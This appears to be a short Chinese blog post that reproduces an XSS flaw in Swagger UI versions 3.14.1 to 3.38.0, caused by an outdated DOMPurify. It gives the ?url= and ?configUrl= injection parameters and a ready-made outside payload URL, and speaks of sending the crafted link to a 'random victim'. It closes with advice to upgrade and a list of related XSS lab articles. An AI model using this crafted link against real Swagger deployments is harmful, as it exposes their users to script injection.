swagger xss漏洞复现

swagger xss漏洞复现

文章目录

漏洞介绍

Swagger UI 有一个有趣的功能,允许您提供 API 规范的 URL - 一个 yaml 或 json 文件,将被获取并显示给用户

根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本:>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗

json网站:https://jumpy-floor.surge.sh/test.yaml

拼接方式

?url=https://your_api_spec/spec.yaml

?configUrl=https://your_api_spec/file.json

漏洞复现

随机找一位受害者访问

进行拼接?url=https://jumpy-floor.surge.sh/test.yaml

弹窗

修复建议:

升级到最新

相关推荐
morris13129 分钟前
【SpringBoot】Xss的常见攻击方式与防御手段
java·spring boot·xss·csp
渗透测试老鸟-九青1 天前
【$15000】 通过监控调试模式实现RCE
安全·web安全·网络安全·渗透·漏洞
假客套2 天前
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
网络安全·xss·dvwa靶场·dvwa xss靶场·web渗透、
假客套2 天前
【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦
网络安全·xss·web渗透·dvwa靶场·dvwa xss靶场
阿宝分享技术2 天前
从xss到任意文件读取
前端·xss
儋州小丑,原号没了,靠北3 天前
XSS-libs
前端·xss
扛枪的书生4 天前
Web 靶场笔记-bWAPP
渗透·web·kali
Yue1one5 天前
Xss_less靶场攻略(1-18)
网络安全·xss
残月只会敲键盘5 天前
ctfshow--xss靶场web327-web333(一命速通不了的靶场)
前端·web3·xss
小野猪都有白菜拱7 天前
XSS小游戏【1-13关】
xss